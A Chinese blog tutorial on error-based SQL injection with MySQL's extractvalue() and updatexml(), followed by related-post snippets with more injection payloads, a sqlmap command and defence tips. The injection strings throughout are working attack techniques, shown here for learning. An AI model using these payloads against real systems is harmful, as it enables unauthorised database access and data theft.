学习基于extractvalue()和updatexml()的报错注入

最新推荐文章于 2025-04-06 09:02:23 发布
最新推荐文章于 2025-04-06 09:02:23 发布
阅读量5.1w 收藏 131
点赞数 50
分类专栏: ctf 学习笔记 web安全 文章标签: 学习笔记 小白 sql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zpy1998zpy/article/details/80631036
版权

extractvalue()

extractvalue() :对XML文档进行查询的函数

其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样

语法:extractvalue(目标xml文档,xml路径)

第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))


使用concat()拼接 ‘  /  ‘ 效果相同,

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘/’,(select database()))))

这里在’anything’中查询不到 位置是 /database()的内容,

但也没有语法错误,不会报错,下面故意写入语法错误:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘~’,(select database()))))

可以看出,以~开头的内容不是xml格式的语法,报错,但是会显示无法识别的内容是什么,这样就达到了目的。

有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位

这里查询前5位示意:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5))))


updatexml()

updatexml()函数与extractvalue()类似,是更新xml文档的函数。

语法updatexml(目标xml文档,xml路径,更新的内容)

select username from security.user where id=1 and (updatexml(‘anything’,’/xx/xx’,’anything’))


报错方式相同:

select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))

同样是32位查询。

转载指明出处

文章同步到我的博客: http://119.23.249.120/archives/256
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1506
改变文档中符合条件的节点,使用不同的 XML 标记匹配替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
SQL注入报错注入
qq_45557130的博客
10-07 642
sql注入报错注入
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
SQL注入,xpath函数updatexml()extractvalue()报错注入原理
金 帛的博客
04-26 4578
SQL注入报错注入原理
XML外部实体注入概述+利用
tengyuehou的博客
04-06 690
1. XXE全称为XML External Entity Injection,亦称XEE,当Web应用的脚本代码没有限制XML引入外部实体,导致用户可以插入一个外部实体,且其中的内容会被服务器端执行,就有可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害的出现。2. 其中XML全称为eXtensible Markup Language,可扩展性标记语言。主要用途是可以在不兼容的系统之间交换数据,利用XML,纯文本文件也可以用来存储数据。
报错注入extractvalue,updatexml)
m0_73477772的博客
05-10 571
但是我们将第二个参数的斜杠替换为另外的符号extractvalue(doc,'~book/author/surname')例如:concat(1,2)的作用是将1,2两个位置的数据拼接起来,0x7e是’~‘的ascll码。这时候我们在第二个参数的位置加入SQL语句,则会返回我们想要的信息。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第一个参数doc XML文档对象名称,第二个参数'____' 路径。如果我们把第二个参数的路径拼写错误,它会查不到内容但不会报错
学习笔记 UpdateXml() MYSQL显错注入
weixin_33849215的博客
12-28 616
学习之前,需要先了解UpdateXml()UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,S...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
floor()函数可以与group byrand()函数联用来进行报错注入报错原理:floor()函数与group by联用时,如果临时表中没有该主键,则在插入前会计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中...
SQL注入报错注入
qq_68163788的博客
01-27 3148
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
SQL注入之路之三:报错注入
weixin_62715196的博客
08-10 702
主要简述什么是报错注入报错注入常用函数,报错注入原理以及如何使用爆破注入获取用户敏感信息
update.xml
07-07
软件更新升级 <?xml version="1.0" encoding="utf-8" ?> <Update> <Soft Name="BlogWriter"> <Verson>1.0.1.2</Verson> <DownLoad>http://www.csdn.net/BlogWrite.rar</DownLoad> </Soft> </Update>
updatexml()函数
m0_74037729的博客
04-09 395
1.XLM_document:是一个XML类型的属性名或表达式。2.XPath_string:指定要更新的节点路径。作用:用于更新 XML 类型的列中的 XML 数据。3.new_value:新值,用于替换匹配的节点。
updatexml函数
m0_62092622的博客
01-27 9602
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据报错来获取所需要的信...
mysql xml函数_MYSQL updatexml()函数报错注入解析
weixin_42188533的博客
02-27 1285
MYSQL updatexml()函数报错注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 2856
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入注入类型为单引号字符型。
updatexml mysql_深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()报错注入
weixin_39942108的博客
01-30 571
SQL各种参数类型下的注入测试数字型-sqlilabs less2前面文章已演示过字符型-sqlilabs less1前面文章已演示过搜索型-自写测试如:www.test.com/index.php?id=1www.test.com/index.php?id=abc(搜索型,一般产生在网站的搜索框)http://www.test.com/search.php?q=1区分参数类型的原因:当参数类型为...
SQL报错注入原理-详细讲解 extractvalue()updatexml()、floor()报错原因
大大大蜜蜂的博客
10-12 6402
SQL报错注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQLextractvalue()updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
SQL注入之错误注入_基于updatexml()的脱库原理
热门推荐
wangyuxiang946的博客
06-21 1万+
updatexml()的基本用法、报错原理及脱库步骤
SQL注入基于堆叠注入报错注入
最新发布
05-09
<think>嗯,用户问的是关于基于堆叠注入SQL报错注入技术。首先,我需要回忆一下堆叠注入报错注入的基本概念。堆叠注入(Stacked Queries)允许攻击者通过分号分隔执行多个SQL语句,这在某些数据库如MySQL中可能受限,但在MSSQL或PostgreSQL中可能有效。而报错注入(Error-based)则是利用数据库的错误信息来获取数据,比如通过故意引发错误来泄露信息。 用户可能已经了解基本的SQL注入,现在想深入这两种技术的结合使用。需要解释堆叠注入如何与报错注入结合,可能的应用场景步骤。比如,攻击者可能先注入一个导致错误的语句,然后通过错误消息获取数据。 然后,我需要考虑实际例子,比如在MSSQL中使用convert函数引发类型转换错误,或者在MySQL中使用updatexml函数。同时,要提到工具如sqlmap的支持,以及如何防范这种攻击,比如参数化查询输入过滤。 另外,用户可能对防御措施感兴趣,所以需要详细说明预防方法,如使用ORM框架、最小权限原则错误信息处理。还要注意引用之前的资料,比如引用中的Chris AnleyFerruh Mavituna的资料,但用户提供的引用可能不直接相关,所以需要适当参考。 最后,生成相关问题时要覆盖技术原理、工具使用、防御实际案例,确保问题有针对性,帮助用户进一步学习。</think># SQL堆叠查询与报错注入技术解析 ## 一、技术原理 1. **堆叠查询(Stacked Queries)** 通过分号`;`分隔执行多个SQL语句的特性,允许攻击者注入额外查询。例如: ```sql SELECT * FROM users WHERE id=1; WAITFOR DELAY '0:0:5' -- ``` 在支持多语句执行的数据库(如MSSQL、PostgreSQL)中,可执行任意操作[^2]。 2. **报错注入(Error-based)** 利用数据库错误响应获取信息,常用函数包括: - MSSQL: `convert()`类型转换错误 - MySQL: `updatexml()`XML解析错误 - PostgreSQL: `cast()`类型转换错误 典型Payload示例: ```sql SELECT 1/@@version; -- MSSQL版本信息泄露 ``` ## 二、组合攻击步骤 1. **探测注入点** ```http GET /product?id=1' AND 1=convert(int,@@version)-- HTTP/1.1 ``` 通过错误响应判断数据库类型版本 2. **构造复合Payload** ```sql '; BEGIN DECLARE @result varchar(8000) SET @result=(SELECT TOP 1 column_name FROM information_schema.columns) SELECT convert(int,@result) END;-- ``` 通过类型转换错误返回查询结果 3. **数据提取** 分阶段获取数据库结构: ```sql '; SELECT 1/COL_LENGTH('users','username'); -- ``` ## 三、技术限制与绕过 | 数据库 | 堆叠查询支持 | 常见报错函数 | |--------------|--------------|---------------------| | MySQL | 部分场景 | updatexml(), extractvalue() | | MSSQL | 支持 | convert(), openquery() | | PostgreSQL | 支持 | cast(), generate_series() | **特殊场景处理**: - 使用`TRY...CATCH`绕过错误过滤(MSSQL) - 结合`XML`函数二次编码(MySQL) - 利用`CTE`表达式链式查询(PostgreSQL) ## 四、防御方案 1. **输入验证** ```python # 使用正则过滤特殊字符 import re def sanitize_input(input_str): return re.sub(r'[;'"\\]', '', input_str) ``` 2. **参数化查询** ```csharp // C#示例 SqlCommand cmd = new SqlCommand("SELECT * FROM Users WHERE ID = @id"); cmd.Parameters.AddWithValue("@id", userInput); ``` 3. **错误处理配置** - 生产环境禁用详细错误信息 - 设置自定义错误页面 - 限制数据库用户权限 ## 五、检测工具 使用sqlmap进行自动化检测: ```bash sqlmap -u "http://example.com/page?id=1" --technique=E --batch --dbms=mssql ``` 参数说明: - `--technique=E` 指定报错注入 - `--union-char` 自定义联合查询字符 - `--prefix`/`--suffix` 指定闭合方式
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值